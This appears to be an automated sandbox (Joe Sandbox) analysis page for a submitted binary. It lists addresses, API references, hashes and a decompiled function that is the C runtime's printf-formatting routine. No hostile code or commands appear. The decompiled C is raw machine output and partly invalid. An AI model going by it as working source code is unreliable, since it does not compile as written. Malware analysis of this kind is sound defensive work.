0x004222f2
0x004222f2
0x004222ff
0x004222ff
0x00422312
0x00000000
0x00422312
0x00422246
0x00422246
0x00422248
0x00422256
0x0042224a
0x0042224a
0x0042224a
0x00422260
0x00422266
0x00422273
0x00422275
0x0042227a
0x0042227c
0x00422281
0x00422286
0x00422288
0x0042228d
0x00422293
0x00422295
0x00422295
0x00422293
0x0042229d
0x004222e5
0x00000000
0x0042229f
0x0042229f
0x004222a4
0x004222c0
0x004222c8
0x004222d2
0x004222d5
0x004222da
0x00000000
0x004222da
0x00000000
0x0042252c
0x0042252c
0x00422536
0x0042253c
0x00422541
0x00422547
0x00422547
0x00000000
0x00000000
0x004224e4
0x004224e4
0x00000000
0x00000000
0x00422121
0x00422125
0x00422133
0x00422136
0x00422127
0x00422127
0x00422127
0x0042213c
0x00422142
0x00422148
0x00422154
0x0042215a
0x00422160
0x004221c7
0x004221cb
0x004221cd
0x004221d3
0x004221d3
0x004221d6
0x004221d9
0x004221df
0x004221df
0x004221df
0x004221eb
0x004221ee
0x004221f6
0x00000000
0x00000000
0x004221f8
0x004221f8
0x004221fe
0x00422203
0x00000000
0x00000000
0x00422205
0x0042220b
0x0042220e
0x0042220e
0x00422216
0x0042221c
0x0042221f
0x00000000
0x00422162
0x00422162
0x00422166
0x00422168
0x0042216d
0x0042216d
0x00422170
0x00422177
0x0042217a
0x00422180
0x00422180
0x00422180
0x0042218c
0x0042218f
0x00422197
0x00000000
0x00000000
0x00422199
0x00422199
0x0042219f
0x004221a4
0x00000000
0x00000000
0x004221a6
0x004221ac
0x004221af
0x004221af
0x004221b7
0x004221bd
0x004221c0
0x004221c2
0x00422222
0x00000000
0x00422222
0x00000000
0x004224db
0x004224db
0x00000000
0x00000000
0x004224f7
0x004224f7
0x00422501
0x00422501
0x0042250b
0x00422511
0x00422513
0x0042251d
0x00422520
0x00422523
0x00422523
0x00000000
0x00000000
0x00000000
0x00000000
0x00421fc4
0x004227d2
0x004227d2
0x004227d2
0x004227d2
0x004227d2
0x004227d2
0x004227d2
0x0042262f
0x00422626
0x0042254a
0x0042254a
0x0042254a

APIs

_get_int64_arg.LIBCMTD ref: 00422558
_get_int64_arg.LIBCMTD ref: 00422580
__aullrem.LIBCMT ref: 00422725
__aulldiv.LIBCMT ref: 00422747
_write_multi_char.LIBCMTD ref: 0042284E
_write_string.LIBCMTD ref: 00422869
_write_multi_char.LIBCMTD ref: 00422895
_wctomb_s.LIBCMTD ref: 00422912

Strings

9, xrefs: 00422758
("Incorrect format specifier", 0), xrefs: 00421B7D, 00421BC3
f:\dd\vctools\crt_bld\self_x86\crt\src\output.c, xrefs: 00421B89, 00421BB9
-, xrefs: 004227EE
_output_s_l, xrefs: 00421BBE

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
String ID: ("Incorrect format specifier", 0)$-$9$_output_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
API String ID: 3451365851-3266125857
Opcode ID: 435c7a65c308ed79db41e461265f588ff5de68eb78012c661b93831b729ffa73
Instruction ID: 5e1609bcaa07dee1266cd8f9ff6a084e1f7c19765941cd1c9b6065e533925ed1
Opcode Fuzzy Hash: 435c7a65c308ed79db41e461265f588ff5de68eb78012c661b93831b729ffa73
Instruction Fuzzy Hash: 96F15DB1E05229AFDB24CF54DD89BEEB7B1BB44304F5081DAE009AB251D7785E80CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0042383B Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 365
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0042383B(signed int __edx) {
				signed int _t485;
				signed int _t504;
				void* _t509;
				signed int _t511;
				void* _t519;
				void* _t537;
				intOrPtr _t541;
				signed int _t558;
				signed short _t559;
				signed int _t562;
				signed int _t565;
				signed int _t566;
				void* _t567;
				signed int _t621;
				signed int _t623;
				signed int _t625;
				signed int _t632;
				signed int _t644;
				signed int _t671;
				void* _t672;
				void* _t673;
				signed int _t674;
				void* _t676;
				void* _t677;
				signed int _t683;

				L0:
				while(1) {
					L0:
					_t621 = __edx;
					 *(_t674 - 0x10) =  *(_t674 - 0x10) | 0x00000040;
					 *(_t674 - 8) = 0xa;
					L150:
					while(1) {
						L150:
						while(1) {
							L150:
							while(1) {
								L150:
								if(( *(_t674 - 0x10) & 0x00008000) == 0) {
									_t623 =  *(_t674 - 0x10) & 0x00001000;
									if(_t623 == 0) {
										if(( *(_t674 - 0x10) & 0x00000020) == 0) {
											_t625 =  *(_t674 - 0x10) & 0x00000040;
											if(_t625 == 0) {
												_t485 = E0041F270(_t674 + 0x14);
												_t677 = _t676 + 4;
												 *(_t674 - 0x4a0) = _t485;
												 *(_t674 - 0x49c) = 0;
											} else {
												_t558 = E0041F270(_t674 + 0x14);
												_t677 = _t676 + 4;
												asm("cdq");
												 *(_t674 - 0x4a0) = _t558;
												 *(_t674 - 0x49c) = _t625;
											}
										} else {
											_t671 =  *(_t674 - 0x10) & 0x00000040;
											if(_t671 == 0) {
												_t559 = E0041F270(_t674 + 0x14);
												_t677 = _t676 + 4;
												asm("cdq");
												 *(_t674 - 0x4a0) = _t559 & 0x0000ffff;
												 *(_t674 - 0x49c) = _t671;
											} else {
												_t562 = E0041F270(_t674 + 0x14);
												_t677 = _t676 + 4;
												asm("cdq");
												 *(_t674 - 0x4a0) = _t562;
												 *(_t674 - 0x49c) = _t671;
											}
										}
									} else {
										_t565 = E0041F290(_t674 + 0x14);
										_t677 = _t676 + 4;
										 *(_t674 - 0x4a0) = _t565;
										 *(_t674 - 0x49c) = _t623;
									}
								} else {
									_t566 = E0041F290(_t674 + 0x14);
									_t677 = _t676 + 4;
									 *(_t674 - 0x4a0) = _t566;
									 *(_t674 - 0x49c) = _t621;
								}
								if(( *(_t674 - 0x10) & 0x00000040) == 0) {
									L167:
									 *(_t674 - 0x4a8) =  *(_t674 - 0x4a0);
									 *(_t674 - 0x4a4) =  *(_t674 - 0x49c);
									goto L168;
								} else {
									L163:
									_t683 =  *(_t674 - 0x49c);
									if(_t683 > 0 || _t683 >= 0 &&  *(_t674 - 0x4a0) >= 0) {
										goto L167;
									} else {
										L166:
										asm("adc edx, 0x0");
										 *(_t674 - 0x4a8) =  ~( *(_t674 - 0x4a0));
										 *(_t674 - 0x4a4) =  ~( *(_t674 - 0x49c));
										 *(_t674 - 0x10) =  *(_t674 - 0x10) | 0x00000100;
										L168:
										if(( *(_t674 - 0x10) & 0x00008000) == 0 && ( *(_t674 - 0x10) & 0x00001000) == 0) {
											 *(_t674 - 0x4a4) =  *(_t674 - 0x4a4) & 0x00000000;
										}
										if( *(_t674 - 0x30) >= 0) {
											 *(_t674 - 0x10) =  *(_t674 - 0x10) & 0xfffffff7;
											if( *(_t674 - 0x30) > 0x200) {
												 *(_t674 - 0x30) = 0x200;
											}
										} else {
											 *(_t674 - 0x30) = 1;
										}
										if(( *(_t674 - 0x4a8) |  *(_t674 - 0x4a4)) == 0) {
											 *(_t674 - 0x1c) = 0;
										}
										 *((intOrPtr*)(_t674 - 4)) = _t674 - 0x249;
										while(1) {
											L178:
											_t631 =  *(_t674 - 0x30) - 1;
											 *(_t674 - 0x30) =  *(_t674 - 0x30) - 1;
											if( *(_t674 - 0x30) <= 0 && ( *(_t674 - 0x4a8) |  *(_t674 - 0x4a4)) == 0) {
												break;
											}
											L180:
											asm("cdq");
											_t632 =  *(_t674 - 0x4a8);
											 *((intOrPtr*)(_t674 - 0x494)) = E00421720(_t632,  *(_t674 - 0x4a4),  *(_t674 - 8), _t631) + 0x30;
											asm("cdq");
											 *(_t674 - 0x4a8) = E004216B0( *(_t674 - 0x4a8),  *(_t674 - 0x4a4),  *(_t674 - 8), _t632);
											 *(_t674 - 0x4a4) = _t632;
											if( *((intOrPtr*)(_t674 - 0x494)) > 0x39) {
												 *((intOrPtr*)(_t674 - 0x494)) =  *((intOrPtr*)(_t674 - 0x494)) +  *((intOrPtr*)(_t674 - 0x460));
											}
											 *((char*)( *((intOrPtr*)(_t674 - 4)))) =  *((intOrPtr*)(_t674 - 0x494));
											 *((intOrPtr*)(_t674 - 4)) =  *((intOrPtr*)(_t674 - 4)) - 1;
										}
										L183:
										 *((intOrPtr*)(_t674 - 0x24)) = _t674 - 0x249 -  *((intOrPtr*)(_t674 - 4));
										 *((intOrPtr*)(_t674 - 4)) =  *((intOrPtr*)(_t674 - 4)) + 1;
										if(( *(_t674 - 0x10) & 0x00000200) != 0 && ( *((intOrPtr*)(_t674 - 0x24)) == 0 ||  *((char*)( *((intOrPtr*)(_t674 - 4)))) != 0x30)) {
											 *((intOrPtr*)(_t674 - 4)) =  *((intOrPtr*)(_t674 - 4)) - 1;
											 *((char*)( *((intOrPtr*)(_t674 - 4)))) = 0x30;
											 *((intOrPtr*)(_t674 - 0x24)) =  *((intOrPtr*)(_t674 - 0x24)) + 1;
										}
										L187:
										while(1) {
											L187:
											while(1) {
												L187:
												while(1) {
													L187:
													while(1) {
														L187:
														while(1) {
															L187:
															while(1) {
																L187:
																while(1) {
																	do {
																		L187:
																		if( *((intOrPtr*)(_t674 - 0x28)) != 0) {
																			L212:
																			if( *(_t674 - 0x20) != 0) {
																				L0040F230( *(_t674 - 0x20), 2);
																				_t677 = _t677 + 8;
																				 *(_t674 - 0x20) = 0;
																			}
																			while(1) {
																				L214:
																				 *(_t674 - 0x454) =  *((intOrPtr*)( *((intOrPtr*)(_t674 + 0xc))));
																				_t580 =  *(_t674 - 0x454) & 0x0000ffff;
																				 *((intOrPtr*)(_t674 + 0xc)) =  *((intOrPtr*)(_t674 + 0xc)) + 2;
																				if(( *(_t674 - 0x454) & 0x0000ffff) == 0 ||  *(_t674 - 0x44c) < 0) {
																					break;
																				} else {
																					if(( *(_t674 - 0x454) & 0x0000ffff) < 0x20 || ( *(_t674 - 0x454) & 0x0000ffff) > 0x78) {
																						 *(_t674 - 0x4d8) = 0;
																					} else {
																						 *(_t674 - 0x4d8) =  *(( *(_t674 - 0x454) & 0x0000ffff) + L"h != _T(\'\\0\'))") & 0xf;
																					}
																				}
																				L7:
																				 *(_t674 - 0x450) =  *(_t674 - 0x4d8);
																				_t644 =  *(_t674 - 0x450) * 9;
																				_t511 =  *(_t674 - 0x45c);
																				_t588 = ( *(_t644 + _t511 + 0x4081a0) & 0x000000ff) >> 4;
																				 *(_t674 - 0x45c) = ( *(_t644 + _t511 + 0x4081a0) & 0x000000ff) >> 4;
																				if( *(_t674 - 0x45c) != 8) {
																					L16:
																					 *(_t674 - 0x4e0) =  *(_t674 - 0x45c);
																					if( *(_t674 - 0x4e0) > 7) {
																						continue;
																					}
																					L17:
																					switch( *((intOrPtr*)( *(_t674 - 0x4e0) * 4 +  &M00423E24))) {
																						case 0:
																							L18:
																							 *(_t674 - 0xc) = 1;
																							E00423F30( *(_t674 - 0x454) & 0x0000ffff,  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
																							_t677 = _t677 + 0xc;
																							goto L214;
																						case 1:
																							L19:
																							 *(__ebp - 0x2c) = 0;
																							__ecx =  *(__ebp - 0x2c);
																							 *(__ebp - 0x28) = __ecx;
																							__edx =  *(__ebp - 0x28);
																							 *(__ebp - 0x18) =  *(__ebp - 0x28);
																							__eax =  *(__ebp - 0x18);
																							 *(__ebp - 0x1c) =  *(__ebp - 0x18);
																							 *(__ebp - 0x10) = 0;
																							 *(__ebp - 0x30) = 0xffffffff;
																							 *(__ebp - 0xc) = 0;
																							goto L214;
																						case 2:
																							L20:
																							__ecx =  *(__ebp - 0x454) & 0x0000ffff;
																							 *(__ebp - 0x4e4) = __ecx;
																							 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
																							 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
																							if( *(__ebp - 0x4e4) > 0x10) {
																								goto L27;
																							}
																							L21:
																							_t59 =  *(__ebp - 0x4e4) + 0x423e5c; // 0x498d04
																							__ecx =  *_t59 & 0x000000ff;
																							switch( *((intOrPtr*)(__ecx * 4 +  &M00423E44))) {
																								case 0:
																									goto L24;
																								case 1:
																									goto L25;
																								case 2:
																									goto L23;
																								case 3:
																									goto L22;
																								case 4:
																									goto L26;
																								case 5:
																									goto L27;
																							}
																						case 3:
																							L28:
																							__ecx =  *(__ebp - 0x454) & 0x0000ffff;
																							if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
																								 *(__ebp - 0x18) =  *(__ebp - 0x18) * 0xa;
																								_t83 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
																								__ecx =  *(__ebp - 0x18) * 0xa + _t83;
																								 *(__ebp - 0x18) = __ecx;
																							} else {
																								__edx = __ebp + 0x14;
																								 *(__ebp - 0x18) = E0041F270(__ebp + 0x14);
																								if( *(__ebp - 0x18) < 0) {
																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
																									__ecx =  *(__ebp - 0x18);
																									__ecx =  ~( *(__ebp - 0x18));
																									 *(__ebp - 0x18) = __ecx;
																								}
																							}
																							goto L214;
																						case 4:
																							L34:
																							 *(__ebp - 0x30) = 0;
																							goto L214;
																						case 5:
																							L35:
																							__edx =  *(__ebp - 0x454) & 0x0000ffff;
																							if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
																								__ecx =  *(__ebp - 0x30);
																								__ecx =  *(__ebp - 0x30) * 0xa;
																								_t94 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
																								__eax = __ecx + _t94;
																								 *(__ebp - 0x30) = __ecx + _t94;
																							} else {
																								__eax = __ebp + 0x14;
																								 *(__ebp - 0x30) = E0041F270(__ebp + 0x14);
																								if( *(__ebp - 0x30) < 0) {
																									 *(__ebp - 0x30) = 0xffffffff;
																								}
																							}
																							goto L214;
																						case 6:
																							L41:
																							__ecx =  *(__ebp - 0x454) & 0x0000ffff;
																							 *(__ebp - 0x4e8) = __ecx;
																							 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
																							 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
																							if( *(__ebp - 0x4e8) > 0x2e) {
																								L64:
																								goto L214;
																							}
																							L42:
																							_t102 =  *(__ebp - 0x4e8) + 0x423e84; // 0x36919003
																							__ecx =  *_t102 & 0x000000ff;
																							switch( *((intOrPtr*)(__ecx * 4 +  &M00423E70))) {
																								case 0:
																									L47:
																									__ecx =  *(__ebp + 0xc);
																									__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
																									if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x36) {
																										L50:
																										__ecx =  *(__ebp + 0xc);
																										__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
																										if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x33) {
																											L53:
																											__ecx =  *(__ebp + 0xc);
																											__edx =  *__ecx & 0x0000ffff;
																											if(( *__ecx & 0x0000ffff) == 0x64) {
																												L59:
																												L61:
																												goto L64;
																											}
																											L54:
																											__eax =  *(__ebp + 0xc);
																											__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
																											if(__ecx == 0x69) {
																												goto L59;
																											}
																											L55:
																											__edx =  *(__ebp + 0xc);
																											__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
																											if(( *( *(__ebp + 0xc)) & 0x0000ffff) == 0x6f) {
																												goto L59;
																											}
																											L56:
																											__ecx =  *(__ebp + 0xc);
																											__edx =  *__ecx & 0x0000ffff;
																											if(( *__ecx & 0x0000ffff) == 0x75) {
																												goto L59;
																											}
																											L57:
																											__eax =  *(__ebp + 0xc);
																											__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
																											if(__ecx == 0x78) {
																												goto L59;
																											}
																											L58:
																											__edx =  *(__ebp + 0xc);
																											__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
																											if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x58) {
																												 *(__ebp - 0x45c) = 0;
																												goto L18;
																											}
																											goto L59;
																										}
																										L51:
																										__eax =  *(__ebp + 0xc);
																										__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
																										if(__ecx != 0x32) {
																											goto L53;
																										} else {
																											 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
																											 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
																											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
																											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
																											goto L61;
																										}
																									}
																									L48:
																									__eax =  *(__ebp + 0xc);
																									__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
																									if(__ecx != 0x34) {
																										goto L50;
																									} else {
																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
																										goto L61;
																									}
																								case 1:
																									L62:
																									__ecx =  *(__ebp - 0x10);
																									__ecx =  *(__ebp - 0x10) | 0x00000020;
																									 *(__ebp - 0x10) = __ecx;
																									goto L64;
																								case 2:
																									L43:
																									__edx =  *(__ebp + 0xc);
																									__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
																									if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x6c) {
																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000010;
																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000010;
																									} else {
																										__ecx =  *(__ebp + 0xc);
																										__ecx =  *(__ebp + 0xc) + 2;
																										 *(__ebp + 0xc) = __ecx;
																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
																									}
																									goto L64;
																								case 3:
																									L63:
																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
																									goto L64;
																								case 4:
																									goto L64;
																							}
																						case 7:
																							goto L65;
																						case 8:
																							L24:
																							__ecx =  *(__ebp - 0x10);
																							__ecx =  *(__ebp - 0x10) | 0x00000002;
																							 *(__ebp - 0x10) = __ecx;
																							goto L27;
																						case 9:
																							L25:
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
																							goto L27;
																						case 0xa:
																							L23:
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
																							goto L27;
																						case 0xb:
																							L22:
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
																							goto L27;
																						case 0xc:
																							L26:
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000008;
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000008;
																							goto L27;
																						case 0xd:
																							L27:
																							goto L214;
																					}
																				} else {
																					_t642 = 0;
																					if(0 == 0) {
																						 *(_t674 - 0x4dc) = 0;
																					} else {
																						 *(_t674 - 0x4dc) = 1;
																					}
																					 *(_t674 - 0x46c) =  *(_t674 - 0x4dc);
																					if( *(_t674 - 0x46c) == 0) {
																						_push(L"(\"Incorrect format specifier\", 0)");
																						_push(0);
																						_push(0x460);
																						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
																						_push(2);
																						_t519 = L0040C820();
																						_t677 = _t677 + 0x14;
																						if(_t519 == 1) {
																							asm("int3");
																						}
																					}
																					L14:
																					if( *(_t674 - 0x46c) != 0) {
																						goto L16;
																					} else {
																						 *((intOrPtr*)(L00411810(_t588))) = 0x16;
																						E0040C660(_t567, _t588, _t672, _t673, L"(\"Incorrect format specifier\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
																						 *(_t674 - 0x4c8) = 0xffffffff;
																						E00410370(_t674 - 0x40);
																						_t504 =  *(_t674 - 0x4c8);
																						L225:
																						return E00410900(_t504, _t567,  *(_t674 - 0x48) ^ _t674, _t642, _t672, _t673);
																					}
																				}
																			}
																			L215:
																			if( *(_t674 - 0x45c) == 0 ||  *(_t674 - 0x45c) == 7) {
																				 *(_t674 - 0x4f8) = 1;
																			} else {
																				 *(_t674 - 0x4f8) = 0;
																			}
																			_t642 =  *(_t674 - 0x4f8);
																			 *(_t674 - 0x4bc) =  *(_t674 - 0x4f8);
																			if( *(_t674 - 0x4bc) == 0) {
																				_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
																				_push(0);
																				_push(0x8f5);
																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
																				_push(2);
																				_t509 = L0040C820();
																				_t677 = _t677 + 0x14;
																				if(_t509 == 1) {
																					asm("int3");
																				}
																			}
																			if( *(_t674 - 0x4bc) != 0) {
																				 *(_t674 - 0x4d4) =  *(_t674 - 0x44c);
																				E00410370(_t674 - 0x40);
																				_t504 =  *(_t674 - 0x4d4);
																			} else {
																				 *((intOrPtr*)(L00411810(_t580))) = 0x16;
																				E0040C660(_t567, _t580, _t672, _t673, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
																				 *(_t674 - 0x4d0) = 0xffffffff;
																				E00410370(_t674 - 0x40);
																				_t504 =  *(_t674 - 0x4d0);
																			}
																			goto L225;
																		}
																		L188:
																		if(( *(_t674 - 0x10) & 0x00000040) != 0) {
																			if(( *(_t674 - 0x10) & 0x00000100) == 0) {
																				if(( *(_t674 - 0x10) & 0x00000001) == 0) {
																					if(( *(_t674 - 0x10) & 0x00000002) != 0) {
																						 *((short*)(_t674 - 0x14)) = 0x20;
																						 *(_t674 - 0x1c) = 1;
																					}
																				} else {
																					 *((short*)(_t674 - 0x14)) = 0x2b;
																					 *(_t674 - 0x1c) = 1;
																				}
																			} else {
																				 *((short*)(_t674 - 0x14)) = 0x2d;
																				 *(_t674 - 0x1c) = 1;
																			}
																		}
																		 *((intOrPtr*)(_t674 - 0x4ac)) =  *((intOrPtr*)(_t674 - 0x18)) -  *((intOrPtr*)(_t674 - 0x24)) -  *(_t674 - 0x1c);
																		if(( *(_t674 - 0x10) & 0x0000000c) == 0) {
																			E00423F90(0x20,  *((intOrPtr*)(_t674 - 0x4ac)),  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
																			_t677 = _t677 + 0x10;
																		}
																		E00423FD0( *(_t674 - 0x1c), _t674 - 0x14,  *(_t674 - 0x1c),  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
																		_t677 = _t677 + 0x10;
																		if(( *(_t674 - 0x10) & 0x00000008) != 0 && ( *(_t674 - 0x10) & 0x00000004) == 0) {
																			E00423F90(0x30,  *((intOrPtr*)(_t674 - 0x4ac)),  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
																			_t677 = _t677 + 0x10;
																		}
																		if( *(_t674 - 0xc) != 0 ||  *((intOrPtr*)(_t674 - 0x24)) <= 0) {
																			L208:
																			E00423FD0( *((intOrPtr*)(_t674 - 0x24)),  *((intOrPtr*)(_t674 - 4)),  *((intOrPtr*)(_t674 - 0x24)),  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
																			_t677 = _t677 + 0x10;
																			goto L209;
																		} else {
																			L202:
																			 *((intOrPtr*)(_t674 - 0x4b0)) =  *((intOrPtr*)(_t674 - 4));
																			 *((intOrPtr*)(_t674 - 0x4b4)) =  *((intOrPtr*)(_t674 - 0x24));
																			while(1) {
																				L203:
																				 *((intOrPtr*)(_t674 - 0x4b4)) =  *((intOrPtr*)(_t674 - 0x4b4)) - 1;
																				if( *((intOrPtr*)(_t674 - 0x4b4)) <= 0) {
																					break;
																				}
																				L204:
																				_t537 = E004103A0(_t674 - 0x40);
																				_t541 = E00420B60(_t674 - 0x458,  *((intOrPtr*)(_t674 - 0x4b0)),  *((intOrPtr*)( *((intOrPtr*)(E004103A0(_t674 - 0x40))) + 0xac)), _t537);
																				_t677 = _t677 + 0x10;
																				 *((intOrPtr*)(_t674 - 0x4b8)) = _t541;
																				if( *((intOrPtr*)(_t674 - 0x4b8)) > 0) {
																					L206:
																					E00423F30( *(_t674 - 0x458) & 0x0000ffff,  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
																					_t677 = _t677 + 0xc;
																					 *((intOrPtr*)(_t674 - 0x4b0)) =  *((intOrPtr*)(_t674 - 0x4b0)) +  *((intOrPtr*)(_t674 - 0x4b8));
																					continue;
																				}
																				L205:
																				 *(_t674 - 0x44c) = 0xffffffff;
																				break;
																			}
																			L207:
																			L209:
																			if( *(_t674 - 0x44c) >= 0 && ( *(_t674 - 0x10) & 0x00000004) != 0) {
																				E00423F90(0x20,  *((intOrPtr*)(_t674 - 0x4ac)),  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
																				_t677 = _t677 + 0x10;
																			}
																			goto L212;
																		}
																		L65:
																		__eax =  *(__ebp - 0x454) & 0x0000ffff;
																		 *(__ebp - 0x4ec) =  *(__ebp - 0x454) & 0x0000ffff;
																		__ecx =  *(__ebp - 0x4ec);
																		__ecx =  *(__ebp - 0x4ec) - 0x41;
																		 *(__ebp - 0x4ec) = __ecx;
																	} while ( *(__ebp - 0x4ec) > 0x37);
																	__edx =  *(__ebp - 0x4ec);
																	_t143 = __edx + 0x423ef0; // 0xcccccc0d
																	__eax =  *_t143 & 0x000000ff;
																	switch( *((intOrPtr*)(( *_t143 & 0x000000ff) * 4 +  &M00423EB4))) {
																		case 0:
																			L120:
																			 *(__ebp - 0x2c) = 1;
																			 *(__ebp - 0x454) & 0x0000ffff = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
																			 *(__ebp - 0x454) = __ax;
																			goto L121;
																		case 1:
																			L67:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
																			}
																			goto L69;
																		case 2:
																			L82:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
																			}
																			goto L84;
																		case 3:
																			L143:
																			 *((intOrPtr*)(__ebp - 0x460)) = 7;
																			goto L145;
																		case 4:
																			L75:
																			__eax = __ebp + 0x14;
																			 *(__ebp - 0x474) = E0041F270(__ebp + 0x14);
																			if( *(__ebp - 0x474) == 0) {
																				L77:
																				__edx =  *0x4bc060; // 0x408114
																				 *(__ebp - 4) = __edx;
																				__eax =  *(__ebp - 4);
																				 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
																				L81:
																				goto L187;
																			}
																			L76:
																			__ecx =  *(__ebp - 0x474);
																			if( *((intOrPtr*)( *(__ebp - 0x474) + 4)) != 0) {
																				L78:
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
																				if(( *(__ebp - 0x10) & 0x00000800) == 0) {
																					 *(__ebp - 0xc) = 0;
																					__edx =  *(__ebp - 0x474);
																					__eax =  *(__edx + 4);
																					 *(__ebp - 4) =  *(__edx + 4);
																					__ecx =  *(__ebp - 0x474);
																					__edx =  *__ecx;
																					 *(__ebp - 0x24) =  *__ecx;
																				} else {
																					__edx =  *(__ebp - 0x474);
																					__eax =  *(__edx + 4);
																					 *(__ebp - 4) =  *(__edx + 4);
																					__ecx =  *(__ebp - 0x474);
																					__eax =  *__ecx;
																					asm("cdq");
																					 *__ecx - __edx =  *__ecx - __edx >> 1;
																					 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
																					 *(__ebp - 0xc) = 1;
																				}
																				goto L81;
																			}
																			goto L77;
																		case 5:
																			L121:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																			__edx = __ebp - 0x448;
																			 *(__ebp - 4) = __ebp - 0x448;
																			 *(__ebp - 0x44) = 0x200;
																			if( *(__ebp - 0x30) >= 0) {
																				L123:
																				if( *(__ebp - 0x30) != 0) {
																					L126:
																					if( *(__ebp - 0x30) > 0x200) {
																						 *(__ebp - 0x30) = 0x200;
																					}
																					L128:
																					if( *(__ebp - 0x30) > 0xa3) {
																						__ecx =  *(__ebp - 0x30);
																						__ecx =  *(__ebp - 0x30) + 0x15d;
